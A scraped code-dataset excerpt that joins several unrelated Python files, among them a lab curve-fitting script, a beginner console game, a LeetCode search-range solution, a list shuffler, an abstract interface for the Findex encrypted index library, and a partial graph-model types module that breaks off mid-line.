fmt='.')\nx_range_10 = np.linspace(min(y_10), max(y_10), 100)\nplt.plot(x_range_10, gaussian(x_range_10, a_10, b_10, c_10), label='Ajuste 10 $\\mu Ci$ em cima', color='blue')\n\n# Plot dos dados, curva ajustada e erros para Rc_5\nplt.errorbar(y_5, Rc_5, yerr=eRc_5, label=f'5 $\\mu Ci$ em cima', capsize=1, markersize=2, ecolor='green', color='green', fmt='.')\nx_range_5 = np.linspace(min(y_5), max(y_5), 100)\nplt.plot(x_range_5, gaussian(x_range_5, a_5, b_5, c_5), label='Ajuste 5 $\\mu Ci$ em cima', color='brown')\n\nplt.grid(True)\nplt.legend()\nplt.xlabel('z [mm]')\nplt.ylabel(f'$R_c$ [1/s]')\nplt.show()\n\n# Imprimir os resultados\nprint(\"Valores dos parâmetros para 10 µCi em cima:\")\nprint(f\"a_10: {a_10}\")\nprint(f\"b_10: {b_10}\")\nprint(f\"c_10: {c_10}\")\nprint(\"\\nValores dos parâmetros para 5 µCi em cima:\")\nprint(f\"a_5: {a_5}\")\nprint(f\"b_5: {b_5}\")\nprint(f\"c_5: {c_5}\")\nprint(\"\\nQui-quadrado e ndf para 10 µCi em cima:\")\nprint(f\"Qui-quadrado_10: {chi_squared_10}\")\nprint(f\"ndf_10: {ndf_10}\")\nprint(\"\\nQui-quadrado e ndf para 5 µCi em cima:\")\nprint(f\"Qui-quadrado_5: {chi_squared_5}\")\nprint(f\"ndf_5: {ndf_5}\")\n\n\n# Converta os parâmetros em números incertos\nparams_10_unc = unc.correlated_values(params_10, covariance_10)\nparams_5_unc = unc.correlated_values(params_5, covariance_5)\n\n# Imprima os resultados com duas casas decimais\nprint(\"Valores dos parâmetros para 10 µCi em cima:\")\nprint(f\"a_10: {params_10_unc[0].nominal_value:.2f} ± {params_10_unc[0].std_dev:.2f}\")\nprint(f\"b_10: {params_10_unc[1].nominal_value:.2f} ± {params_10_unc[1].std_dev:.2f}\")\nprint(f\"c_10: {params_10_unc[2].nominal_value:.2f} ± {params_10_unc[2].std_dev:.2f}\")\nprint(\"\\nValores dos parâmetros para 5 µCi em cima:\")\nprint(f\"a_5: {params_5_unc[0].nominal_value:.2f} ± {params_5_unc[0].std_dev:.2f}\")\nprint(f\"b_5: {params_5_unc[1].nominal_value:.2f} ± {params_5_unc[1].std_dev:.2f}\")\nprint(f\"c_5: {params_5_unc[2].nominal_value:.2f} ± {params_5_unc[2].std_dev:.2f}\")","repo_name":"C3N0UR4S/LFEA_II","sub_path":"Sessao_6/altura.py","file_name":"altura.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24231095863","text":"from enum import Enum\nimport random\n\nclass mmenu(Enum):\n Lnum = '1'\n Rock = '2'\n Exit = '0'\nclass rmenu(Enum):\n PwB = '1'\n PwP = '2'\n Exit = '0' \n \nclass choice(Enum):\n Rock = 1\n Paper = 2\n Scissor = 3\n\n\ndef PB():\n while True:\n Bchoice = random.randint(1,4) #Banswer = Bot Choice\n pn = input('Enter your name or press 0 and enter to go back:') #pn = PlayerName\n if pn == '0':\n print('Thank you for playing')\n break\n print(f'Player Name:{pn}')\n print('1.Rock')\n print('2.Paper')\n print('3.Scissor')\n Pchoice = input('Enter your choice:') #Pchoice = Player Choice\n Pchoice = int(Pchoice)\n if Bchoice == choice.Rock.value:\n if Pchoice == choice.Paper.value:\n print(f'Bot answer is {Bchoice}')\n print(f'{pn} win the game')\n elif Pchoice == choice.Scissor.value:\n print(f'Bot answer is {Bchoice}')\n print('Bot win the game')\n elif Bchoice == choice.Paper.value:\n if Pchoice == choice.Rock.value:\n print(f'Bot answer is{Bchoice}')\n print(f'{pn} win the game')\n elif Pchoice == choice.Scissor.value:\n print(f'Bot answer is {Bchoice}')\n print('Bot win the game')\n elif Bchoice == choice.Scissor.value:\n if Pchoice == choice.Paper.value:\n print(f'Bot answer is {Bchoice}')\n print('Bot win the game')\n elif Pchoice == choice.Rock.value:\n print(f'Bot answer is {Bchoice}')\n print(f'{pn} win the game')\n return \n\n \ndef PP():\n while True:\n print('If you want to go back just press 0 and enter ^_^')\n Np1 = input('Enter your name Player1:') #Np1 = Name Player 1\n Np2 = input('Enter your name Playe2:') #Np2 = Name Player 2\n if Np1 or Np2 == 0:\n break\n print('1.Rock')\n print('2.Paper')\n print('3.Scissor')\n print('Please enter your choice:')\n P1choice = input(f'{Np1}:') #P1choice = Player 1 Choice\n P2choice = input(f'{Np2}:') #P2choice = Player 2 Choice\n if P1choice == choice.Rock.value:\n if P2choice == choice.Paper.value:\n print(f'{Np2} win the game')\n elif P2choice == choice.scissor.value: \n print(f'{Np1} win the game')\n elif P1choice == choice.Paper.value:\n if P2choice == choice.Rock.value:\n print(f'{Np2} win the game ')\n elif P2choice == choice.Scissor.value:\n print(f'{Np1} win the game ')\n elif P1choice == choice.scissor.value:\n if P2choice == choice.Paper.value:\n print(f'{Np2} win the game')\n elif P2choice == choice.Scissor.value:\n print(f'{Np1} win the game')\n return \n\n\ndef LuckyGame1():\n while True:\n Num = input('Enter number from 1-100 or Press 0 and Enter to exit:')\n Num = int(Num)\n RanNum = random.randint(1,101)\n if Num == 0:\n break\n elif Num == RanNum:\n print('----------')\n print(f'You win')\n print('----------')\n else :\n print('-'*47)\n print('You lose')\n print(f'The Number is {RanNum} But your number is {Num}')\n print('-'*47)\n return\n\n\ndef RockGame2():\n print('Welcome to rock paper and scissors game')\n while True:\n print('1.Play with Bot')\n print('2.Play with your Partner')\n print('0.Exit')\n Rmenu = input('>>>')\n if Rmenu == rmenu.PwB.value: #PwBw = Play With Bot\n PB()\n elif Rmenu == rmenu.PwP.value: #PwP = Play with Player\n PP()\n elif Rmenu == rmenu.Exit.value:\n break\n return\n\n\ndef MainMenu():\n print('Welcome to the jungle Game')\n while True:\n print('Choose the game you want to play')\n print('1.Lucky Number')\n print('2.Rock Paper Scissor')\n print('0.Exit')\n Mmenu = input('>>>')\n if Mmenu == mmenu.Lnum.value:\n LuckyGame1()\n elif Mmenu == mmenu.Rock.value:\n RockGame2()\n elif Mmenu == mmenu.Exit.value:\n break\n return\n\n\nMainMenu()","repo_name":"OukVichheka/file-home-koompi-hello-Contact.py","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15552658306","text":"'''\nGiven an array of integers nums sorted in ascending order, \nfind the starting and ending position of a given target value.\n\nIf target is not found in the array, return [-1, -1].\n\nFollow up: Could you write an algorithm with O(log n) runtime complexity?\n\nExample 1:\n\nInput: nums = [5,7,7,8,8,10], target = 8\nOutput: [3,4]\n\nExample 2:\n\nInput: nums = [5,7,7,8,8,10], target = 6\nOutput: [-1,-1]\n\nExample 3:\n\nInput: nums = [], target = 0\nOutput: [-1,-1]\n'''\ndef binary_search(arr, low, high, x): \n \n mid = (high + low) // 2\n\n # If element is present at the middle itself \n if arr[mid] == x: \n return mid \n\n # If element is smaller than mid, then it can only \n # be present in left subarray \n elif arr[mid] > x: \n return binary_search(arr, low, mid - 1, x) \n\n # Else the element can only be present in right subarray \n else: \n return binary_search(arr, mid + 1, high, x) \n\n\ndef searchRange(nums, target: int):\n\n if target not in nums:\n return [-1, -1]\n else:\n\n if len(nums) == 1:\n return [0, 0]\n\n high = len(nums) - 1\n low = 0\n center = (binary_search(nums, low, high, target))\n # print(center)\n c1 = center\n while nums[c1] == target:\n if c1 == low:\n first = c1\n break\n else:\n first = c1\n c1 = c1 - 1\n\n c2 = center\n while nums[c2] == target:\n if c2 == high:\n last = high\n break\n else:\n last = c2\n c2 = c2 + 1\n\n if \"last\" not in locals():\n last = center\n if \"first\" not in locals():\n first = center\n return [first, last]\n\nnums = [5,7,7,8,8,10]\ntarget = 8\nprint(searchRange(nums, target))\n\nnums = [2, 2]\ntarget = 2\nprint(searchRange(nums, target)) \n\n'''\nnums = [5,7,7,8,8,10]\ntarget = 6\nsearchRange(nums, target)\n\nnums = []\ntarget = 0\nsearchRange(nums, target)\n'''\n","repo_name":"qscez2001/leetcode","sub_path":"34_Find_First_Last.py","file_name":"34_Find_First_Last.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5624637646","text":"from random import random\nfrom math import floor\n\ndef random_reorder(l):\n # just iterate throught the list,\n # swap each item with another one in a random index and...\n # reach the end of the list, done.\n\n if len(l) < 2: # if length is 1 or 0, do nothing.\n return\n\n for i in range(0, len(l)):\n if random() > 0.1: # sometimes you skip an item to add more randomness (1/10 chance of skipping)\n random_index = floor(random() * len(l) )\n temp = l[i]\n l[i] = l[random_index]\n l[random_index] = temp\n \n\nx = [1,2,3,4,5,6,7,8]\n\nrandom_reorder(x)\nprint(x)","repo_name":"sam-val/algorithmic-problems","sub_path":"random_reorder_array.py","file_name":"random_reorder_array.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16793490593","text":"# -*- coding: utf-8 -*-\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Callable, Dict, List, Optional, Sequence, Set, Tuple, Union\n\nfrom cloudproof_findex import (\n IndexedValuesAndKeywords,\n InternalFindex,\n Keyword,\n Label,\n Location,\n MasterKey,\n ProgressResults,\n SearchResults,\n)\n\n\nclass FindexBase(metaclass=ABCMeta):\n def __init__(self) -> None:\n self.findex_core = InternalFindex()\n\n\nclass FindexUpsert(FindexBase, metaclass=ABCMeta):\n \"\"\"Implement this class to use Findex Upsert API\"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.findex_core.set_upsert_callbacks(\n self.fetch_entry_table,\n self.upsert_entry_table,\n self.insert_chain_table,\n )\n\n def upsert(\n self,\n master_key: MasterKey,\n label: Label,\n additions: IndexedValuesAndKeywords,\n deletions: IndexedValuesAndKeywords,\n ) -> Set[Keyword]:\n \"\"\"Upserts the given relations between `IndexedValue` and `Keyword` into Findex tables.\n\n Args:\n master_key (MasterKey): the user master key\n label (Label): label used to allow versioning\n additions (Dict[Location | Keyword, List[Keyword | str]]):\n map of `IndexedValue` to a list of `Keyword` to add to the index\n deletions (Dict[Location | Keyword, List[Keyword | str]]):\n map of `IndexedValue` to a list of `Keyword` to delete from the index\n \"\"\"\n return self.findex_core.upsert_wrapper(master_key, label, additions, deletions)\n\n @abstractmethod\n def fetch_entry_table(\n self, entry_uids: List[bytes]\n ) -> Sequence[Tuple[bytes, bytes]]:\n \"\"\"Query the Entry Table.\n\n Args:\n entry_uids (List[bytes], optional): uids to query. if None, return the entire table\n\n Returns:\n Sequence[Tuple[bytes, bytes]]: uid -> value mapping\n \"\"\"\n\n @abstractmethod\n def upsert_entry_table(\n self, entry_updates: Dict[bytes, Tuple[bytes, bytes]]\n ) -> Dict[bytes, bytes]:\n \"\"\"Update key-value pairs in the Entry Table.\n\n Args:\n entry_updates (Dict[bytes, Tuple[bytes, bytes]]): uid -> (old_value, new_value)\n\n Returns:\n Dict[bytes, bytes]: entries that failed update (uid -> current value)\n \"\"\"\n\n @abstractmethod\n def insert_chain_table(self, chain_items: Dict[bytes, bytes]) -> None:\n \"\"\"Insert new key-value pairs in the Chain Table.\n\n Args:\n chain_items (Dict[bytes, bytes]): uid -> value mapping to insert\n \"\"\"\n\n\nclass FindexSearch(FindexBase, metaclass=ABCMeta):\n \"\"\"Implement this class to use Findex Search API\"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.findex_core.set_search_callbacks(\n self.fetch_entry_table, self.fetch_chain_table\n )\n\n @abstractmethod\n def fetch_entry_table(\n self, entry_uids: List[bytes]\n ) -> Sequence[Tuple[bytes, bytes]]:\n \"\"\"Query the Entry Table.\n\n Args:\n entry_uids (List[bytes], optional): uids to query. if None, return the entire table\n\n Returns:\n Sequence[Tuple[bytes, bytes]]: uid -> value mapping\n \"\"\"\n\n @abstractmethod\n def fetch_chain_table(self, chain_uids: List[bytes]) -> Dict[bytes, bytes]:\n \"\"\"Query the Chain Table.\n\n Args:\n chain_uids (List[bytes]): uids to query\n\n Returns:\n Dict[bytes, bytes]: uid -> value mapping\n \"\"\"\n\n def search(\n self,\n master_key: MasterKey,\n label: Label,\n keywords: Sequence[Union[Keyword, str]],\n progress_callback: Optional[Callable[[ProgressResults], bool]] = None,\n ) -> SearchResults:\n \"\"\"Recursively search Findex graphs for `Locations` corresponding to the given `Keyword`.\n\n Args:\n keywords (List[Keyword | str]): keywords to search using Findex.\n master_key (MasterKey): user secret key.\n label (Label): public label used in keyword hashing.\n progress_callback (Callable[[Dict[str, List[IndexedValue]]], bool], optional): callback\n to process intermediate search results.\n\n Returns:\n Dict[Keyword, List[Location]]: `Locations` found by `Keyword`\n \"\"\"\n return self.findex_core.search_wrapper(\n master_key,\n label,\n keywords,\n progress_callback,\n )\n\n\nclass FindexCompact(FindexBase, metaclass=ABCMeta):\n \"\"\"Implement this class to use Findex Compact API\"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.findex_core.set_compact_callbacks(\n self.fetch_entry_table,\n self.fetch_chain_table,\n self.update_lines,\n self.list_removed_locations,\n self.fetch_all_entry_table_uids,\n )\n\n @abstractmethod\n def fetch_entry_table(\n self, entry_uids: List[bytes]\n ) -> Sequence[Tuple[bytes, bytes]]:\n \"\"\"Query the Entry Table.\n\n Args:\n entry_uids (List[bytes]): uids to query\n\n Returns:\n Sequence[Tuple[bytes, bytes]]: uid -> value mapping\n \"\"\"\n\n @abstractmethod\n def fetch_all_entry_table_uids(self) -> Set[bytes]:\n \"\"\"Return all UIDs in the Entry Table.\n\n Returns:\n Set[bytes]: uid set\n \"\"\"\n\n @abstractmethod\n def fetch_chain_table(self, chain_uids: List[bytes]) -> Dict[bytes, bytes]:\n \"\"\"Query the Chain Table.\n\n Args:\n chain_uids (List[bytes]): uids to query\n\n Returns:\n Dict[bytes, bytes]: uid -> value mapping\n \"\"\"\n\n @abstractmethod\n def insert_chain_table(self, chain_items: Dict[bytes, bytes]) -> None:\n \"\"\"Insert new key-value pairs in the Chain Table.\n\n Args:\n chain_items (Dict[bytes, bytes]): uid -> value mapping to insert\n \"\"\"\n\n @abstractmethod\n def insert_entry_table(self, entries_items: Dict[bytes, bytes]) -> None:\n \"\"\"Insert new key-value pairs in the Entry Table.\n\n Args:\n entries_items (Dict[bytes, bytes]): uid -> value mapping to insert\n \"\"\"\n\n @abstractmethod\n def remove_entry_table(self, entry_uids: Optional[List[bytes]] = None) -> None:\n \"\"\"Remove entries from Entry Table.\n\n Args:\n entry_uids (List[bytes], optional): uid of entries to delete. if None,\n delete all entries\n \"\"\"\n\n @abstractmethod\n def remove_chain_table(self, chain_uids: List[bytes]) -> None:\n \"\"\"Remove entries from Chain Table.\n\n Args:\n chain_uids (List[bytes]): uids to remove from the chain table\n \"\"\"\n\n @abstractmethod\n def list_removed_locations(self, locations: List[Location]) -> List[Location]:\n \"\"\"Check whether the given `Locations` still exist.\n\n Args:\n locations (List[Location]): `Locations` to check\n\n Returns:\n List[Location]: list of `Locations` that were removed\n \"\"\"\n\n def update_lines(\n self,\n removed_chain_table_uids: List[bytes],\n new_encrypted_entry_table_items: Dict[bytes, bytes],\n new_encrypted_chain_table_items: Dict[bytes, bytes],\n ) -> None:\n \"\"\"Example implementation of the compact callback\n\n Update the database with the new values.\n This function should:\n\n - removes all the Entry Table;\n - removes `chain_table_uids_to_remove` from the Chain Table;\n - inserts `new_chain_table_items` into the Chain Table;\n - inserts `new_entry_table_items` into the Entry Table.\n\n The order of these operations is not important but has some\n implications. This implementation keeps the database small but prevents\n using the index during the `update_lines`.\n\n Override this method if you want another implementation, e.g. :\n\n 1. saves all Entry Table UIDs;\n 2. inserts `new_chain_table_items` into the Chain Table;\n 3. inserts `new_entry_table_items` into the Entry Table;\n 4. publish new label to users;\n 5. remove old lines from the Entry Table (using the saved UIDs in 1.);\n 6. removes `chain_table_uids_to_remove` from the Chain Table.\n\n With this implementation, the index tables are much bigger during a small duration,\n but users can continue using the index during the `update_lines`.\n \"\"\"\n\n self.remove_entry_table()\n self.remove_chain_table(removed_chain_table_uids)\n self.insert_chain_table(new_encrypted_chain_table_items)\n self.insert_entry_table(new_encrypted_entry_table_items)\n\n def compact(\n self,\n master_key: MasterKey,\n new_master_key: MasterKey,\n new_label: Label,\n num_reindexing_before_full_set: int,\n ) -> None:\n \"\"\"Performs compacting on the entry and chain tables.\n\n Args:\n num_reindexing_before_full_set (int): number of compacting to do before\n being sure that a big portion of the indexes were checked\n master_key (MasterKey): current master key\n new_master_key (MasterKey): newly generated key\n new_label (Label): newly generated label\n \"\"\"\n self.findex_core.compact_wrapper(\n master_key, new_master_key, new_label, num_reindexing_before_full_set\n )\n","repo_name":"Cosmian/cloudproof_python","sub_path":"src/cloudproof_py/findex/Findex.py","file_name":"Findex.py","file_ext":"py","file_size_in_byte":9482,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71709962027","text":"import dataclasses\nimport keyword\nfrom dataclasses import dataclass, field\nfrom datetime import datetime\nfrom enum import Enum\nfrom typing import ClassVar, Dict, List, Optional, Set, Tuple, Union, cast\nfrom uuid import UUID, uuid4\n\nimport humps # type: ignore\nimport marshmallow # type: ignore\nfrom marshmallow import ( # type: ignore\n ValidationError,\n fields,\n post_load,\n pre_dump,\n validates,\n)\nfrom more_itertools import partition # type: ignore\n\nfrom core import types as t\nfrom core.json import CamelCaseSchema, Serializable\nfrom core.util import is_datetime, normalize_datetime\n\nfrom .. import errors as err\nfrom . import datatypes as dt\nfrom .datatypes import into_uuid\nfrom .util import (\n RESERVED_PREFIX,\n is_reserved_model_name,\n is_reserved_property_name,\n strip_reserved_prefix,\n)\n\n\ndef get_organization_id(thing: object) -> t.OrganizationId:\n \"\"\"\n Extract an organization ID from an input value.\n\n Raises\n ------\n InvalidOrganizationError\n \"\"\"\n if isinstance(thing, int):\n return t.OrganizationId(thing)\n try:\n int_id = int(thing) # type: ignore\n return t.OrganizationId(int_id)\n except ValueError:\n raise err.InvalidOrganizationError(id=str(thing))\n\n\ndef get_dataset_id(thing: object) -> t.DatasetId:\n \"\"\"\n Extract an dataset ID from an input value.\n\n Raises\n ------\n InvalidDatasetError\n \"\"\"\n if isinstance(thing, int):\n return t.DatasetId(thing)\n try:\n int_id = int(thing) # type: ignore\n return t.DatasetId(int_id)\n except ValueError:\n raise err.InvalidDatasetError(id=str(thing))\n\n\ndef get_model_id(thing: Union[\"Model\", t.ModelId, UUID, str]) -> t.ModelId:\n \"\"\"\n Given a `Model` or an model ID, return a model ID.\n \"\"\"\n if isinstance(thing, UUID):\n return t.ModelId(thing)\n elif isinstance(thing, Model):\n return thing.id\n return t.ModelId(UUID(thing))\n\n\nis_model_id = dt.is_uuid\n\n\ndef get_model_property_id(\n thing: Union[\"ModelProperty\", t.ModelPropertyId, UUID, str]\n) -> t.ModelPropertyId:\n \"\"\"\n Given a `ModelProperty` or an model property ID, return a model property ID.\n \"\"\"\n if isinstance(thing, UUID):\n return t.ModelPropertyId(thing)\n elif isinstance(thing, ModelProperty):\n return thing.id\n return t.ModelPropertyId(UUID(thing))\n\n\nis_model_property_id = dt.is_uuid\n\n\ndef get_record_id(thing: Union[\"Record\", t.RecordId, UUID, str]) -> t.RecordId:\n \"\"\"\n Given a `Record` or an record ID, return a record ID.\n \"\"\"\n if isinstance(thing, UUID):\n return t.RecordId(thing)\n elif isinstance(thing, Record):\n return thing.id\n return t.RecordId(UUID(thing))\n\n\nis_record_id = dt.is_uuid\n\n\ndef get_model_relationship_id(\n thing: Union[\"ModelRelationship\", t.ModelRelationshipId, UUID, str]\n) -> t.ModelRelationshipId:\n \"\"\"\n Given a `ModelRelationship` or a relationship ID, return a relationship ID.\n \"\"\"\n if isinstance(thing, UUID):\n return t.ModelRelationshipId(thing)\n elif isinstance(thing, ModelRelationship):\n return thing.id\n return t.ModelRelationshipId(UUID(thing))\n\n\nis_model_relationship_id = dt.is_uuid\n\n# UUIDs have 36 characters\nUUID_LENGTH = 36\n\n\ndef normalize_relationship_type(relationship_name: str) -> str:\n \"\"\"\n Normalizes a relationship name to upper-snake-case.\n\n If the relationship name has a UUID suffix added by the Python client\n or frontend, it is removed.\n\n This also helps dealing with the Neo4j relationship type limitation of max\n of 65K unique names.\n\n Examples\n --------\n - \"\"belongs_to_478e215d-04ec-4cdf-ac8b-d5289601c9f7\" -> \"BELONGS_TO\"\n \"\"\"\n from .validate import validate_relationship_name\n\n validate_relationship_name(relationship_name)\n\n if (\n len(relationship_name) > UUID_LENGTH + 1\n and relationship_name[-(UUID_LENGTH + 1)] == \"_\"\n and dt.is_uuid(relationship_name[-UUID_LENGTH:])\n ):\n relationship_name = relationship_name[: -(UUID_LENGTH + 1)]\n\n return relationship_name.replace(\"/\", \"_\").replace(\".\", \"_\").upper().strip()\n\n\ndef get_relationship_type(\n r: Union[\"ModelRelationship\", t.RelationshipType, t.RelationshipName, str]\n) -> t.RelationshipType:\n \"\"\"\n Transform and format a string into a relationship type.\n\n A relationship type is the canonical representation of a relationship\n in Neo4j: a typeful, an upper-snake-cased name.\n\n Examples\n --------\n - \"foo\" -> \"FOO\"\n - \"DoctorVisit\" -> \"DOCTOR_VISIT\"\n - \"tHiS_IsATesT\" -> \"THIS_IS_A_TEST\"\n \"\"\"\n relationship_type = r.type if isinstance(r, ModelRelationship) else r\n return t.RelationshipType(normalize_relationship_type(relationship_type))\n\n\ndef get_record_relationship_id(\n thing: Union[\"RecordRelationship\", t.RecordRelationshipId, UUID, str]\n) -> t.RecordRelationshipId:\n \"\"\"\n Given a `RecordRelationship` or a relationship ID, return a typed\n relationship ID.\n \"\"\"\n if isinstance(thing, UUID):\n return t.RecordRelationshipId(thing)\n elif isinstance(thing, RecordRelationship):\n return thing.id\n return t.RecordRelationshipId(UUID(thing))\n\n\nis_record_relationship_id = dt.is_uuid\n\n\ndef get_package_proxy_id(\n r: Union[\"PackageProxy\", t.PackageProxyId, UUID, str]\n) -> t.PackageProxyId:\n \"\"\"\n Given a `PackageProxy` or an PackageProxy ID, return a PackageProxy ID.\n \"\"\"\n if isinstance(r, UUID):\n return t.PackageProxyId(r)\n elif isinstance(r, PackageProxy):\n return t.PackageProxyId(r.id)\n return t.PackageProxyId(UUID(r))\n\n\nis_package_proxy_id = dt.is_uuid\n\n###############################################################################\n\n\nclass OrderDirection(str, Enum):\n ASC = \"asc\"\n DESC = \"desc\"\n\n @classmethod\n def parse(cls, s: str) -> \"OrderDirection\":\n return OrderDirection(s.strip().lower())\n\n\n# Order by\n\n\n@dataclass(frozen=True)\nclass OrderBy:\n @classmethod\n def field(cls, name: str, ascending: bool = True) -> \"OrderBy\":\n return OrderByField(name=name, ascending=ascending)\n\n @property\n def is_field(self) -> bool:\n return False\n\n @classmethod\n def relationship(cls, type: str, ascending: bool = True) -> \"OrderBy\":\n return OrderByRelationship(type=type, ascending=ascending)\n\n @property\n def is_relationship(self) -> bool:\n return False\n\n\n@dataclass(frozen=True)\nclass OrderByField(OrderBy):\n\n CREATED_AT_FIELDS: ClassVar[Set[str]] = set(\n [\n \"~created_at\",\n \"created_at\",\n \"createdAt\",\n \"$created_at\",\n \"$createdAt\",\n RESERVED_PREFIX + \"created_at\",\n RESERVED_PREFIX + \"createdAt\",\n ]\n )\n UPDATED_AT_FIELDS: ClassVar[Set[str]] = set(\n [\n \"~updated_at\",\n \"updated_at\",\n \"updatedAt\",\n \"$updated_at\",\n \"$updatedAt\",\n RESERVED_PREFIX + \"updated_at\",\n RESERVED_PREFIX + \"updatedAt\",\n ]\n )\n\n name: str\n ascending: bool = field(default=True)\n\n @property\n def is_field(self) -> bool:\n return True\n\n @property\n def is_created_at(self) -> bool:\n name = self.name.strip()\n return name in self.CREATED_AT_FIELDS or name.lower() in self.CREATED_AT_FIELDS\n\n @property\n def is_updated_at(self) -> bool:\n name = self.name.strip()\n return name in self.UPDATED_AT_FIELDS or name.lower() in self.UPDATED_AT_FIELDS\n\n @property\n def direction(self) -> OrderDirection:\n if self.ascending:\n return OrderDirection.ASC\n else:\n return OrderDirection.DESC\n\n\n@dataclass(frozen=True)\nclass OrderByRelationship(OrderBy):\n\n SUPPORTED_LABELS: ClassVar[Set[str]] = set(\n [\n \"~label\",\n \"label\",\n \"$label\",\n RESERVED_PREFIX + \"label\",\n \"type\",\n \"$type\",\n RESERVED_PREFIX + \"type\",\n ]\n )\n\n type: str\n ascending: bool = field(default=True)\n\n @property\n def is_relationship(self) -> bool:\n return True\n\n @property\n def is_supported_type(self) -> bool:\n \"\"\"\n Only relationship labels (types) are supported for sorting.\n \"\"\"\n t = self.type.strip()\n return t in self.SUPPORTED_LABELS or t.lower() in self.SUPPORTED_LABELS\n\n\n###############################################################################\n\n\nclass FromNodeMixin:\n @classmethod\n def _is_reserved(cls, t: Tuple[str, t.GraphValue]) -> bool:\n k, _ = t\n return is_reserved_property_name(k)\n\n @classmethod\n def from_node(cls, **data) -> object:\n defined_properties = set([f.name for f in dataclasses.fields(cls)])\n\n # Partition all reserved properties (those whose name begin with the\n # RESERVED_PREFIX character), and user-settable properties:\n user_props, reserved_props = partition(cls._is_reserved, data.items())\n\n props = {humps.decamelize(k): v for k, v in user_props}\n for k, v in reserved_props:\n kk = strip_reserved_prefix(humps.decamelize(k))\n if kk in defined_properties:\n props[kk] = v\n\n # Append '_' to any kwargs that are a reserved word:\n for k in props:\n if keyword.iskeyword(k):\n props[k + \"_\"] = props.pop(k)\n\n return cls(**props) # type: ignore\n\n\nclass DatasetSchema(CamelCaseSchema):\n id = fields.Integer()\n node_id = fields.String(allow_none=True)\n\n @post_load\n def make(self, data, **kwargs):\n return PropertyValue(**data)\n\n\n@dataclass(frozen=True)\nclass Dataset(Serializable):\n\n __schema__: ClassVar[DatasetSchema] = DatasetSchema(unknown=marshmallow.EXCLUDE)\n\n PUBLIC: ClassVar[Set[str]] = set([\"id\", \"node_id\"])\n\n id: t.DatasetId\n node_id: Optional[str] = field(default=None)\n\n @classmethod\n def from_node(cls, data) -> \"Dataset\":\n\n id = t.DatasetId(data[\"id\"])\n node_id: Optional[str] = data.get(\"node_id\")\n\n return Dataset(id=id, node_id=node_id)\n\n\n@dataclass(frozen=True)\nclass Package(Serializable):\n id: int\n node_id: str\n\n\nclass ModelSchema(CamelCaseSchema):\n id = fields.UUID()\n name = fields.String()\n display_name = fields.String()\n description = fields.String()\n count = fields.Integer(default=0)\n created_at = fields.DateTime(format=\"iso\")\n updated_at = fields.DateTime(format=\"iso\")\n created_by = fields.String()\n updated_by = fields.String()\n template_id = fields.UUID(required=False, allow_none=True)\n\n @post_load\n def make(self, data, **kwargs):\n return Model(**data)\n\n\n@dataclass(frozen=True)\nclass Model(FromNodeMixin, Serializable):\n\n __schema__: ClassVar[ModelSchema] = ModelSchema(unknown=marshmallow.EXCLUDE)\n\n PUBLIC: ClassVar[Set[str]] = set(\n [\"id\", \"name\", \"display_name\", \"description\", \"template_id\"]\n )\n\n id: t.ModelId\n name: str\n display_name: str\n description: str\n count: int\n created_at: datetime\n updated_at: datetime\n created_by: t.UserNodeId\n updated_by: t.UserNodeId\n template_id: Optional[UUID] = field(default=None)\n\n @validates(\"name\")\n def validate_name(self, name):\n # HACK: this validation is defined as a method to work around a\n # circular import between `models.validation` and `models.types`\n from .validate import validate_model_name\n\n try:\n validate_model_name(name)\n except err.ModelNameValidationError as e:\n raise ValidationError from e\n\n def __post_init__(self):\n # Needed since neotime.DateTime does not work with Python copy.deepcopy\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"created_at\", normalize_datetime(self.created_at))\n object.__setattr__(self, \"updated_at\", normalize_datetime(self.updated_at))\n\n\nclass ModelPropertySchema(CamelCaseSchema):\n name = fields.String(required=True)\n display_name = fields.String(required=True)\n data_type = fields.Function(\n required=True,\n serialize=lambda o: o.data_type.to_dict(),\n deserialize=dt.deserialize,\n )\n description = fields.String(required=False)\n index = fields.Integer(required=False, default=0)\n locked = fields.Boolean(required=False, default=False)\n required = fields.Boolean(required=False, default=False)\n model_title = fields.Boolean(required=False, default=False)\n # If True, show this property as a column in tables of records\n default = fields.Boolean(required=False, default=True)\n default_value = fields.Raw(required=False, allow_none=True)\n created_at = fields.DateTime(required=False, format=\"iso\")\n updated_at = fields.DateTime(required=False, format=\"iso\")\n id = fields.UUID(required=False, allow_none=True)\n\n @post_load\n def make(self, data, **kwargs):\n return ModelProperty(**data)\n\n\n@dataclass(frozen=True)\nclass ModelProperty(FromNodeMixin, Serializable):\n \"\"\"\n A property on a model represented using a node and modelled as\n\n (m:Model)--[r:MODEL_RELATIONSHIP_TYPE]->(p:ModelProperty)\n \"\"\"\n\n IMMUTABLE: ClassVar[Set[str]] = set([\"name\", \"data_type\"])\n PUBLIC: ClassVar[Set[str]] = set(\n [\n \"id\",\n \"name\",\n \"display_name\",\n \"data_type\",\n \"description\",\n \"index\",\n \"locked\",\n \"required\",\n \"model_title\",\n \"default_value\",\n \"default\",\n ]\n )\n\n __schema__: ClassVar[ModelPropertySchema] = ModelPropertySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n name: str\n display_name: str\n data_type: dt.DataType\n description: str = field(default=\"\")\n index: int = field(default=0)\n locked: bool = field(default=False)\n required: bool = field(default=False)\n model_title: bool = field(default=False)\n default: bool = field(default=True)\n default_value: Optional[t.GraphValue] = field(default=None)\n created_at: datetime = field(default_factory=datetime.now)\n updated_at: datetime = field(default_factory=datetime.now)\n created_by: str = field(default=\"\")\n updated_by: str = field(default=\"\")\n id: t.ModelPropertyId = field(default_factory=lambda: 